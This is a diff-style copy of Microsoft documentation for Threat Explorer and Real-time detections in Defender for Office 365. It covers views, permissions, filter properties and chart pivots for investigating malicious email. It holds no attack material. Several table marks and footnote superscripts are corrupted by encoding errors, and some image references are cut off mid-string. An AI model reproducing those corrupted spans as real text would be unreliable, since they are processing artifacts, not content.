-5. When you're finished configuring date/time and property filters, select **Refresh**.
-
-The **Email** tab (view) in the details area of the **[All email](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)**, **[Malware](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-malware-view-in-threat-explorer-and-real-time-detections)**, or **[Phish](threat-explorer-real-time-detections-about.md#email-view-for-the-details-area-of-the-phish-view-in-threat-explorer-and-real-time-detections)** views contains the details you need to investigate suspicious email.
-
-For example, Use the **Delivery Action**, **Original delivery location**, and **Last delivery location** columns in the **Email** tab (view) to get a complete picture of where the affected messages went. The values were explained in Step 4.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to selectively export up to 200,000 filtered or unfiltered results to a CSV file.
-
-## Remediate malicious email that was delivered
-
-After you identify the malicious email messages that were delivered, you can remove them from recipient mailboxes. For instructions, see [Remediate malicious email delivered in Microsoft 365](remediate-malicious-email-delivered-office-365.md).
-
-## Related articles
-
-[Remediate malicious email delivered in Office 365](remediate-malicious-email-delivered-office-365.md)
-
-[Microsoft Defender for Office 365](office-365-ti.md)
-
-[View reports for Defender for Office 365](reports-defender-for-office-365.md)
security Threat Explorer Real Time Detections About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/threat-explorer-real-time-detections-about.md
- Title: About Threat Explorer and Real-time detections in Microsoft Defender for Office 365
- - NOCSH
---- Previously updated : 3/22/2024-
- - m365-security
- - tier1
- - highpri
-description: Learn about the available views, filters, and actions in Threat Explorer (Explorer) or Real-time detections to investigate and respond to threats.
--- seo-marvel-apr2020-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# About Threat Explorer and Real-time detections in Microsoft Defender for Office 365
--
-Microsoft 365 organizations that have [Microsoft Defender for Office 365](mdo-about.md) included in their subscription or purchased as an add-on have **Explorer** (also known as **Threat Explorer**) or **Real-time detections**. These features are powerful, near real-time reporting tools that help Security Operations (SecOps) teams investigate and respond to threats.
-
-Depending on your subscription, Threat Explorer or Real-time detections is available in the **Email & collaboration** section in the Microsoft Defender portal at <https://security.microsoft.com>:
--- **Real-time detections** is available in _Defender for Office 365 Plan 1_. The **Real-time detections** page is available directly at <https://security.microsoft.com/realtimereportsv3>.-
- :::image type="content" source="../../media/te-rtd-select-real-time-detections.png" alt-text="Screenshot of the Real-time detections selection in the Email & collaboration section in the Microsoft Defender portal." lightbox="../../media/te-rtd-select-real-time-detections.png":::
--- **Threat Explorer** is available in _Defender for Office 365 Plan 2_. The **Explorer** page is available directly at <https://security.microsoft.com/threatexplorerv3>.-
- :::image type="content" source="../../media/te-rtd-select-threat-explorer.png" alt-text="Screenshot of the Explorer selection in the Email & collaboration section in the Microsoft Defender portal." lightbox="../../media/te-rtd-select-threat-explorer.png":::
-
-Threat Explorer contains the same information and capabilities as Real-time detections, but with the following additional features:
--- More views.-- More property filtering options, including the option to save queries.-- More actions.-
-For more information about the differences between Defender for Office 365 Plan 1 and Plan 2, see the [Defender for Office 365 Plan 1 vs. Plan 2 cheat sheet](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
-
-The rest of this article explains the views and features that are available in Threat Explorer and Real-time detections.
-
-> [!TIP]
-> For email scenarios using Threat Explorer and Real-time detections, see the following articles:
->
-> - [Threat hunting in Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-threat-hunting.md)
-> - [Email security with Threat Explorer and Real-time detections in Microsoft Defender for Office 365](threat-explorer-email-security.md)
-> - [Investigate malicious email that was delivered in Microsoft 365](threat-explorer-investigate-delivered-malicious-email.md)
-
-## Permissions and licensing for Threat Explorer and Real-time detections
-
-To use Explorer or Real-time detections, you need to be assigned permissions. You have the following options:
--- [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell):
- - _Read access for email and Teams message headers_: **Security operations/Raw data (email & collaboration)/Email & collaboration metadata (read)**.
- - _Preview and download email messages_: **Security operations/Raw data (email & collaboration)/Email & collaboration content (read)**.
- - _Remediate malicious email_: **Security operations/Security data/Email & collaboration advanced actions (manage)**.
-- [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md):
- - _Full access_: Membership in the **Organization Management** or **Security Administrator** role groups. More permissions are required to do all available actions:
- - _Preview and download messages_: Requires the **Preview** role, which is assigned only to the **Data Investigator** or **eDiscovery Manager** role groups by default. Or, you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Preview** role assigned, and add the users to the custom role group.
- - _Move messages in and delete messages from mailboxes_: Requires the **Search and Purge** role, which is assigned only to the **Data Investigator** or **Organization Management** role groups by default. Or, you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Search and Purge** role assigned, and add the users to the custom role group.
- - _Read-only access_: Membership in the **Security Reader** role group.
-- [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership these roles gives users the required permissions _and_ permissions for other features in Microsoft 365:
- - _Full access_: Membership in the **Global Administrator** or **Security Administrator** roles.
- - _Search for Exchange mail flow rules (transport rules) by name in Threat Explorer_: Membership in the **Security Administrator** or **Security Reader** roles.
- - _Read-only access_: Membership in the **Global Reader** or **Security Reader** roles.
-
-
-
-> [!TIP]
-> Audit log entries are generated when admins preview or download email messages. You can search the admin audit log by user for **AdminMailAccess** activity. For instructions, see [Audit New Search](/purview/audit-new-search).
-
-To use Threat Explorer or Real-time detections, you need to be assigned a license for Defender for Office 365 (included in your subscription or an add-on license).
-
-Threat Explorer or Real-time detections contains data for users with Defender for Office 365 licenses assigned to them.
-
-## Elements of Threat Explorer and Real-time detections
-
-Threat Explorer and Real-time detections contain the following elements:
--- **Views**: Tabs at the top of the page that organize detections by threat. The view affects the rest of the data and options on the page.-
- The following table lists the available views in Threat Explorer and Real-time detections:
-
- |View|Threat<br/>Explorer|Real-time<br/>detections|Description|
- ||::|::||
- |**All email**|Γ£ö||Default view for Threat Explorer. Information about all email messages sent by external users into your organization, or email sent between internal users in your organization.|
- |**Malware**|Γ£ö|Γ£ö|Default view for Real-time detections. Information about email messages that contain malware.|
- |**Phish**|Γ£ö|Γ£ö|Information about email messages that contain phishing threats.|
- |**Campaigns**|Γ£ö||Information about malicious email that Defender for Office 365 Plan 2 identified as part of a [coordinated phishing or malware campaign](campaigns.md).|
- |**Content malware**|Γ£ö|Γ£ö|Information about malicious files detected by the following features: <ul><li>[Built-in virus protection in SharePoint, OneDrive, and Microsoft Teams](anti-malware-protection-for-spo-odfb-teams-about.md)</li><li>[Safe Attachments for Sharepoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md)</li></ul>|
- |**URL clicks**|Γ£ö||Information about user clicks on URLs in email messages, Teams messages, SharePoint files, and OneDrive files.|
-
- These views are described in detail in this article, including the differences between Threat Explorer and Real-time detections.
--- **Date/time filters**: By default, the view is filtered by yesterday and today. To change the date filter, select the date range, and then select **Start Date** and **End date** values up to 30 days ago.-
- :::image type="content" source="../../media/te-rtd-date-filter.png" alt-text="Screenshot of the date filter used in Threat Explorer and Real-time detections in the Defender portal." lightbox="../../media/te-rtd-date-filter.png":::
--- **Property filters (queries)**: Filter the results in the view by the available message, file, or threat properties. The available filterable properties depend on the view. Some properties are available in many views, while other properties are limited to a specific view.-
- The available property filters for each view are listed in this article, including the differences between Threat Explorer and Real-time detections.
-
- For instructions to create property filters, see [Property filters in Threat Explorer and Real-time detections](#property-filters-in-threat-explorer-and-real-time-detections)
-
- Threat Explorer allows you to save queries for later use as described in the [Saved queries in Threat Explorer](#saved-queries-in-threat-explorer) section.
--- **Charts**: Each view contains a visual, aggregate representation of the filtered or unfiltered data. You can use available pivots to organize the chart in different ways.-
- You can often use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export chart data** to export filtered or unfiltered chart data to a CSV file.
-
- The charts and available pivots are described in detail in this article, including the differences between Threat Explorer and Real-time detections.
-
- > [!TIP]
- > To remove the chart from the page (which maximizes the size of the details area), use either of the following methods:
- >
- > - Select :::image type="icon" source="../../media/m365-cc-sc-chart-view-icon.png" border="false"::: **Chart View** \> :::image type="icon" source="../../media/m365-cc-sc-list-view-icon.png" border="false"::: **List View** at the top of the page.
- > - Select :::image type="icon" source="../../media/m365-cc-sc-show-list-view-icon.png" border="false"::: **Show list view** between the chart and the details area.
--- **Details area**: The details area for a view typically shows a table that contains the filtered or unfiltered data. You can use the available views (tabs) to organize the data in the details area in different ways. For example, a view might contain charts, maps, or different tables.-
- If the details area contains a table, you can often use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to selectively export up to 200,000 filtered or unfiltered results to a CSV file.
-
- > [!TIP]
- > In the **Export** flyout, you can select some or all of the available properties to export. The selections are saved per user. Selections in Incognito or InPrivate browsing mode are saved until you close the web browser.
--
-## All email view in Threat Explorer
-
-The **All email** view in Threat Explorer shows information about all email messages sent by external users into your organization, and email sent between internal users in your organization. The view shows malicious and non-malicious email. For example:
--- Email identified phishing or malware.-- Email identified as spam or bulk.-- Email identified with no threats.-
-This view is the default in Threat Explorer. To open the **All email** view on the **Explorer** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **All email** tab. Or, go directly to the **Explorer** page using <https://security.microsoft.com/threatexplorerv3>, and then verify that the **All email** tab is selected.
--
-### Filterable properties in the All email view in Threat Explorer
-
-By default, no property filters are applied to the data. The steps to create filters (queries) are described in the [Filters in Threat Explorer and Real-time detections](#property-filters-in-threat-explorer-and-real-time-detections) section later in this article.
-
-The filterable properties that are available in the **Delivery action** box in the **All email** view are described in the following table:
-
-|Property|Type|
-|||
-|**Basic**||
-|Sender address|Text. Separate multiple values by commas.|
-|Recipients|Text. Separate multiple values by commas.|
-|Sender domain|Text. Separate multiple values by commas.|
-|Recipient domain|Text. Separate multiple values by commas.|
-|Subject|Text. Separate multiple values by commas.|
-|Sender display name|Text. Separate multiple values by commas.|
-|Sender mail from address|Text. Separate multiple values by commas.|
-|Sender mail from domain|Text. Separate multiple values by commas.|
-|Return path|Text. Separate multiple values by commas.|
-|Return path domain|Text. Separate multiple values by commas.|
-|Malware family|Text. Separate multiple values by commas.|
-|Tags|Text. Separate multiple values by commas. <br/><br/> For more information about user tags, see [User tags](user-tags-about.md).|
-|Impersonated domain|Text. Separate multiple values by commas.|
-|Impersonated user|Text. Separate multiple values by commas.|
-|Exchange transport rule|Text. Separate multiple values by commas.|
-|Data loss prevention rule|Text. Separate multiple values by commas.|
-|Context|Select one or more values: <ul><li>**Evaluation**</li><li>**Priority account protection**</li></ul>|
-|Connector|Text. Separate multiple values by commas.|
-|Delivery action|Select one or more values: <ul><li>**Blocked**: Email messages that were quarantined, that failed delivery, or were dropped.</li><li>**Delivered**: Email delivered to the user's Inbox or other folder where the user can access the message.</li><li>**Delivered to junk**: Email delivered to the user's Junk Email folder or Deleted Items folder where the user can access the message.</li><li>**Replaced**: Message attachments that were replaced by [Dynamic Delivery in Safe Attachments policies](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies).</li></ul>|
-|Additional action|Select one or more values: <ul><li>**Automated remediation**</li><li>**Dynamic Delivery**: For more information, see [Dynamic Delivery in Safe Attachments policies](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies).</li><li>**Manual remediation**</li><li>**None**</li><li>**Quarantine release**</li><li>**Reprocessed**: The message was retroactively identified as good.</li><li>**ZAP**: For more information, see [Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365](zero-hour-auto-purge.md).</li></ul>|
-|Directionality|Select one or more values: <ul><li>**Inbound**</li><li>**Intra-irg**</li><li>**Outbound**</li></ul>|
-|Detection technology|Select one or more values: <ul><li>**Advanced filter**: Signals based on machine learning.</li><li>**Antimalware protection**</li><li>**Bulk**</li><li>**Campaign**</li><li>**Domain reputation**</li><li>**File detonation**: [Safe Attachments](safe-attachments-about.md) detected a malicious attachment during detonation analysis.</li><li>**File detonation reputation**: File attachments previously detected by [Safe Attachments](safe-attachments-about.md) detonations in other Microsoft 365 organizations.</li><li>**File reputation**: The message contains a file that was previously identified as malicious in other Microsoft 365 organizations.</li><li>**Fingerprint matching**: The message closely resembles a previous detected malicious message.</li><li>**General filter**</li><li>**Impersonation brand**: Sender impersonation of well-known brands.</li><li>**Impersonation domain**: Impersonation of sender domains that you own or specified for protection in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)</li><li>**Impersonation user**</li><li>**IP reputation**</li><li>**Mailbox intelligence impersonation**: Impersonation detections from mailbox intelligence in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).</li><li>**Mixed analysis detection**: Multiple filters contributed to the message verdict.</li><li>**spoof DMARC**: The message failed [DMARC authentication](email-authentication-dmarc-configure.md).</li><li>**Spoof external domain**: Sender email address spoofing using a domain that's external to your organization.</li><li>**Spoof intra-org**: Sender email address spoofing using a domain that's internal to your organization.</li><li>**URL detonation reputation**: URLs previously detected by [Safe Links](safe-links-about.md) detonations in other Microsoft 365 organizations.</li><li>**URL malicious reputation**: The message contains a URL that was previously identified as malicious in other Microsoft 365 organizations.</li></ul>|
-|Original delivery location|Select one or more values: <ul><li>**Deleted Items folder**</li><li>**Dropped**</li><li>**Failed**</li><li>**Inbox/folder**</li><li>**Junk folder**</li><li>**On-prem/external**</li><li>**Quarantine**</li><li>**Unknown**</li></ul>|
-|Latest delivery location┬╣|Same values as **Original delivery location**</li></ul>|
-|Phish confidence level|Select one or more values: <ul><li>**High**</li><li>**Normal**</li></ul>|
-|Primary override|Select one or more values: <ul><li>**Allowed by organization policy**</li><li>**Allowed by user policy**</li><li>**Blocked by organization policy**</li><li>**Blocked by user policy**</li><li>**None**</li></ul>|
-|Primary override source|Messages can have multiple allow or block overrides as identified in **Override source**. The override that ultimately allowed or blocked the message is identified in **Primary override source**. <br/> Select one or more values: <ul><li>**3rd Party Filter**</li><li>**Admin initiated time travel** (ZAP)</li><li>**Antimalware policy block by file type**</li><li>**Antispam policy settings**</li><li>**Connection policy**</li><li>**Exchange transport rule**</li><li>**Exclusive mode (User override)**</li><li>**Filtering skipped due to on-prem organization**</li><li>**IP region filter from policy**</li><li>**Language filter from policy**</li><li>**Phishing Simulation**</li><li>**Quarantine release**</li><li>**SecOps Mailbox**</li><li>**Sender address list (Admin Override)**</li><li>**Sender address list (User override)**</li><li>**Sender domain list (Admin Override)**</li><li>**Sender domain list (User override)**</li><li>**Tenant Allow/Block List file block**</li><li>**Tenant Allow/Block List sender email address block**</li><li>**Tenant Allow/Block List spoof block**</li><li>**Tenant Allow/Block List URL block**</li><li>**Trusted contact list (User override)**</li><li>**Trusted domain (User override)**</li><li>**Trusted recipient (User override)**</li><li>**Trusted senders only (User override)**</li></ul>|
-|Override source|Same values as **Primary override source**</li></ul>|
-|Policy type|Select one or more values: <ul><li>**Anti-malware policy**</li><li>**Anti-phishing policy**</li><li>**Exchange transport rule** (mail flow rule), **Hosted content filter policy** (anti-spam policy), **Hosted outbound spam filter policy** (outbound spam policy), **Safe Attachments policy**</li><li>**Unknown**</li></ul>|
-|Policy action|Select one or more values: <ul><li>**Add x-header**</li><li>**Bcc message**</li><li>**Delete message**</li><li>**Modify subject**</li><li>**Move to Junk Email folder**</li><li>**No action taken**</li><li>**Redirect message**</li><li>**Send to quarantine**</li></ul>|
-|Threat type|Select one or more values: <ul><li>**Malware**</li><li>**Phish**</li><li>**Spam**</li></ul>|
-|Forwarded message|Select one or more values: <ul><li>**True**</li><li>**False**</li></ul>|
-|Distribution list|Text. Separate multiple values by commas.|
-|Email size|Integer. Separate multiple values by commas.|
-|**Advanced**||
-|Internet Message ID|Text. Separate multiple values by commas. <br/><br/> Available in the **Message-ID** header field in the message header. An example value is `<08f1e0f6806a47b4ac103961109ae6ef@server.domain>` (note the angle brackets).|
-|Network message ID|Text. Separate multiple values by commas. <br/><br/> A GUID value that's available in the **X-MS-Exchange-Organization-Network-Message-Id** header field in the message header.|
-|Sender IP|Text. Separate multiple values by commas.|
-|Attachment SHA256|Text. Separate multiple values by commas.|
-|Cluster ID|Text. Separate multiple values by commas.|
-|Alert ID|Text. Separate multiple values by commas.|
-|Alert Policy ID|Text. Separate multiple values by commas.|
-|Campaign ID|Text. Separate multiple values by commas.|
-|ZAP URL signal|Text. Separate multiple values by commas.|
-|**Urls**||
-|URL Count|Integer. Separate multiple values by commas.|
-|URL domain┬▓|Text. Separate multiple values by commas.|
-|URL domain and path┬▓|Text. Separate multiple values by commas.|
-|URL┬▓|Text. Separate multiple values by commas.|
-|URL path┬▓|Text. Separate multiple values by commas.|
-|URL source|Select one or more values: <ul><li>**Attachments**</li><li>**Cloud attachment**</li><li>**Email body**</li><li>**Email header**</li><li>**QR Code**</li><li>**Subject**</li><li>**Unknown**</li></ul>|
-|Click verdict|Select one or more values: <ul><li>**Allowed**: The user was allowed to open the URL.</li><li>**Block overridden**: The user was blocked from directly opening the URL, but they overrode the block to open the URL.</li><li>**Blocked**: The user was blocked from opening the URL.</li><li>**Error**: The user was presented with the error page, or an error occurred in capturing the verdict.</li><li>**Failure**: An unknown exception occurred while capturing the verdict. The user might have opened the URL.</li><li>**None**: Unable to capture the verdict for the URL. The user might have opened the URL.</li><li>**Pending verdict**: The user was presented with the detonation pending page.</li><li>**Pending verdict bypassed**: The user was presented with the detonation page, but they overrode the message to open the URL.</li></ul>|
-|URL Threat|Select one or more values: <ul><li>**Malware**</li><li>**Phish**</li><li>**Spam**</li></ul>|
-|**File**||
-|Attachment Count|Integer. Separate multiple values by commas.|
-|Attachment filename|Text. Separate multiple values by commas.|
-|File type|Text. Separate multiple values by commas.|
-|File Extension|Text. Separate multiple values by commas.|
-|File Size|Integer. Separate multiple values by commas.|
-|**Authentication**||
-|SPF|Select one or more values: <ul><li>**Fail**</li><li>**Neutral**</li><li>**None**</li><li>**Pass**</li><li>**Permanent error**</li><li>**Soft fail**</li><li>**Temporary error**</li></ul>|
-|DKIM|Select one or more values: <ul><li>**Error**</li><li>**Fail**</li><li>**Ignore**</li><li>**None**</li><li>**Pass**</li><li>**Test**</li><li>**Timeout**</li><li>**Unknown**</li></ul>|
-|DMARC|Select one or more values: <ul><li>**Best guess pass**</li><li>**Fail**</li><li>**None**</li><li>**Pass**</li><li>**Permanent error**</li><li>**Selector pass**</li><li>**Temporary error**</li><li>**Unknown**</li></ul>|
-|Composite|Select one or more values: <ul><li>**Fail**</li><li>**None**</li><li>**Pass**</li><li>**Soft pass**</li></ul>|
-
-> [!TIP]
-> ┬╣ **Latest delivery location** doesn't include end-user actions on messages. For example, if the user deleted the message or moved the message to an archive or PST file.
->
-> There are scenarios where **Original delivery location**/**Latest delivery location** and/or **Delivery action** have the value **Unknown**. For example:
->
-> - The message was delivered (**Delivery action** is **Delivered**), but an Inbox rule moved the message to a default folder other than the Inbox or Junk Email folder (for example, the Draft or Archive folder).
-> - ZAP attempted to move the message after delivery, but the message wasn't found (for example, the user moved or deleted the message).
->
-> ┬▓ By default, a URL search maps to `http`, unless another value is explicitly specified. For example:
->
-> - Searching with and without the `http://` prefix in **URL**, **URL Domain**, and **URL Domain and Path** should show the same results.
-> - Search for the `https://` prefix in **URL**. When no value is specified, the `http://` prefix is assumed.
-> - `/` at the beginning and end of the **URL path**, **URL Domain**, **URL domain and path** fields is ignored.
-> - `/` at the end of the **URL** field is ignored.
-
-### Pivots for the chart in the All email view in Threat Explorer
-
-The chart has a default view, but you can select a value from **Select pivot for histogram chart** to change how the filtered or unfiltered chart data is organized and displayed.
-
-The available chart pivots are described in the following subsections.
-
-#### Delivery action chart pivot in the All email view in Threat Explorer
-
-Although this pivot doesn't look selected by default, **Delivery action** is the default chart pivot in the **All email** view.
-
-The **Delivery action** pivot organizes the chart by the actions taken on messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each delivery action.
-
-#### Sender domain chart pivot in the All email view in Threat Explorer
-
-The **Sender domain** pivot organizes the chart by the domains in messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each sender domain.
-
-#### Sender IP chart pivot in the All email view in Threat Explorer
-
-The **Sender IP** pivot organizes the chart by the source IP addresses of messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each sender IP address.
-
-#### Detection technology chart pivot in the All email view in Threat Explorer
-
-The **Detection technology** pivot organizes the chart by the feature that identified messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each detection technology.
-
-#### Full URL chart pivot in the All email view in Threat Explorer
-
-The **Full URL** pivot organizes the chart by the full URLs in messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each full URL.
-
-#### URL domain chart pivot in the All email view in Threat Explorer
-
-The **URL domain** pivot organizes the chart by the domains in URLs in messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each URL domain.
-
-#### URL domain and path chart pivot in the All email view in Threat Explorer
-
-The **URL domain and path** pivot organizes the chart by the domains and paths in URLs in messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each URL domain and path.
-
-### Views for the details area of the All email view in Threat Explorer
-
-The available views (tabs) in the details area of the **All email** view are described in the following subsections.
-
-#### Email view for the details area of the All email view in Threat Explorer
-
-**Email** is the default view for the details area in the **All email** view.
-
-The **Email** view shows a details table. You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Date**<sup>\*</sup>-- **Subject**<sup>\*</sup>-- **Recipient**<sup>\*</sup>-- **Recipient domain**-- **Tags**<sup>\*</sup>-- **Sender address**<sup>\*</sup>-- **Sender display name**-- **Sender domain**<sup>\*</sup>-- **Sender IP**-- **Sender mail from address**-- **Sender mail from domain**-- **Additional actions**<sup>\*</sup>-- **Delivery action**-- **Latest delivery location**<sup>\*</sup>-- **Original delivery location**<sup>\*</sup>-- **System overrides source**-- **System overrides**-- **Alert ID**-- **Internet message ID**-- **Network message ID**-- **Mail language**-- **Exchange transport rule**-- **Connector**-- **Context**-- **Data loss prevention rule**-- **Threat type**<sup>\*</sup>-- **Detection technology**-- **Attachment Count**-- **URL Count**-- **Email size**-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
->
-> Customized column settings are saved per user. Customized column settings in Incognito or InPrivate browsing mode are saved until you close the web browser.
-
-When you select one or more entries from the list by selecting the check box next to the first column, **Message actions** is available. For information, see [Threat hunting: Email remediation](threat-explorer-threat-hunting.md#email-remediation).
--
-In the **Subject** value for the entry, the :::image type="icon" source="../../medi).
-
-When you click on the **Subject** or **Recipient** values in an entry, details flyouts open. These flyouts are described in the following subsections.
-
-##### Email details from the Email view of the details area in the All email view
-
-When you select the **Subject** value of an entry in the table, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains standardized summary information that's also available on the [Email entity page](mdo-email-entity-page.md) for the message.
-
-For details about the information in the Email summary panel, see [The Email summary panel in Defender](mdo-email-entity-page.md#the-email-summary-panel).
-
-The following actions are available at the top of the Email summary panel for Threat Explorer and Real-time detections:
--- :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Open email entity**-- :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **View header**-- :::image type="icon" source="../../medi#remediate-using-take-action).-- :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options**:
- - :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **Email preview**┬╣ ┬▓
- - :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download email**┬╣ ┬▓ ┬│
- - :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **View in Explorer**
- - :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **Go hunt**⁴
-
-┬╣ The **Email preview** and **Download email** actions require the **Preview** role in [Email & collaboration permissions](mdo-portal-permissions.md). By default, this role is assigned to the **Data Investigator** and **eDiscovery Manager** role groups. By default, members of the **Organization Management** or **Security Administrators** role groups can't do these actions. To allow these actions for the members of those groups, you have the following options:
--- Add the users to the **Data Investigator** or **eDiscovery Manager** role groups.-- [Create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Search and Purge** role assigned, and add the users to the custom role group.-
-┬▓ You can preview or download email messages that are available in Microsoft 365 mailboxes. Examples of when messages are no longer available in mailboxes include:
--- The message was dropped before delivery or delivery failed.-- The message was _soft deleted_ (deleted from the Deleted items folder, which moves the message to the Recoverable Items\Deletions folder).-- ZAP moved the message to quarantine.-
-┬│ **Download email** isn't available for messages that were quarantined. Instead, [download a password protected copy of the message from quarantine](quarantine-admin-manage-messages-files.md#download-email-from-quarantine).
-
-⁴ **Go hunt** is available only in Threat Explorer. It isn't available in Real-time detections.
-
-##### Recipient details from the Email view of the details area in the All email view
-
-When you select an entry by clicking on the **Recipient** value, a details flyout opens with the following information:
-
-> [!TIP]
-> To see details about other recipients without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
--- **Summary** section:
- - **Role**: Whether the recipient has any admin roles assigned.
- - **Policies**:
- - Whether the user has permission to see archive information.
- - Whether the user has permission to see retention information.
- - Whether the user is covered by data loss prevention (DLP).
- - Whether the user is covered by **Mobile management** at <https://portal.office.com/EAdmin/Device/IntuneInventory.aspx>.
-- **Email** section: A table showing the following related information for messages sent to the recipient:
- - **Date**
- - **Subject**
- - **Recipient**
-
- Select **View all email** to open Threat Explorer in a new tab filtered by the recipient.
--- **Recent alerts** section: A table showing the following related information for related recent alerts:
- - **Severity**
- - **Alert policy**
- - **Category**
- - **Activities**
-
- If there are more than three recent alerts, select **View all recent alerts** to see all of them.
-
- - **Recent activity** section: Shows the summarized results of an [Audit log search](/purview/audit-new-search) for the recipient:
- - **Date**
- - **IP address**
- - **Activity**
- - **Item**
-
- If the recipient has more than three audit log entries, select **View all recent activity** to see all of them.
-
- > [!TIP]
- > Members of the **Security Administrators** role group in [Email & collaboration permissions](mdo-portal-permissions.md) can't expand the **Recent activity** section. You need to be a member of a role group in [Exchange Online permissions](/exchange/permissions-exo/permissions-exo) that has the **Audit Logs**, **Information Protection Analyst**, or **Information Protection Investigator** roles assigned. By default, those roles are assigned to the **Records Management**, **Compliance Management**, **Information Protection**, **Information Protection Analysts**, **Information Protection Investigators**, and **Organization Management** role groups. You can add the members of **Security Administrators** to those role groups, or you can [create a new role group](/exchange/recipients-in-exchange-online/manage-permissions-for-recipients#use-the-eac-to-assign-permissions-to-individual-mailboxes) with with the **Audit Logs** role assigned.
--
-#### URL clicks view for the details area of the All email view in Threat Explorer
-
-The **URL clicks** view shows a chart that can be organized using pivots. The chart has a default view, but you can select a value from **Select pivot for histogram chart** to change how the filtered or unfiltered chart data is organized and displayed.
-
-The chart pivots are described in the following subsections.
--
-> [!TIP]
-> In Threat Explorer, each pivot in **URL clicks** view has a :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View all clicks** action that opens the [URL clicks view](#url-clicks-view-in-threat-explorer) in a new tab.
-
-##### URL domain pivot for the URL clicks view for the details area of the All email view in Threat Explorer
-
-Although this chart pivot doesn't appear to be selected, **URL domain** is the default chart pivot in the **URL clicks** view.
-
-The **URL domain** pivot shows the different domains in URLs in email messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each URL domain.
-
-##### Click verdict pivot for the URL clicks view for the details area of the All email view in Threat Explorer
-
-The **Click verdict** pivot shows the different verdicts for clicked URLs in email messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each click verdict.
-
-##### URL pivot for the URL clicks view for the details area of the All email view in Threat Explorer
-
-The **URL** pivot shows the different URLs that were clicked in email messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each URL.
-
-##### URL domain and path pivot for the URL clicks view for the details area of the All email view in Threat Explorer
-
-The **URL domain and path** pivot shows the different domains and file paths of URLs that were clicked in email messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each URL domain and file path.
-
-#### Top URLs view for the details area of the All email view in Threat Explorer
-
-The **Top URLs** view shows a details table. You can sort the entries by clicking on an available column header:
--- **URL**-- **Messages blocked**-- **Messages junked**-- **Messages delivered**-
-##### Top URLs details for the All email view
-
-When you select an entry by clicking anywhere in the row other than the check box next to the first column, a details flyout opens with the following information:
-
-> [!TIP]
-> To see details about other URLs without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
--- The following actions are available at the top of the flyout:
- - :::image type="icon" source="../../media/m365-cc-sc-open-url-page-icon.png" border="false"::: **Open URL page**
- - :::image type="icon" source="../../media/m365-cc-sc-send-icon.png" border="false"::: **Submit for analysis**:
- - :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Report clean**
- - :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Report phishing**
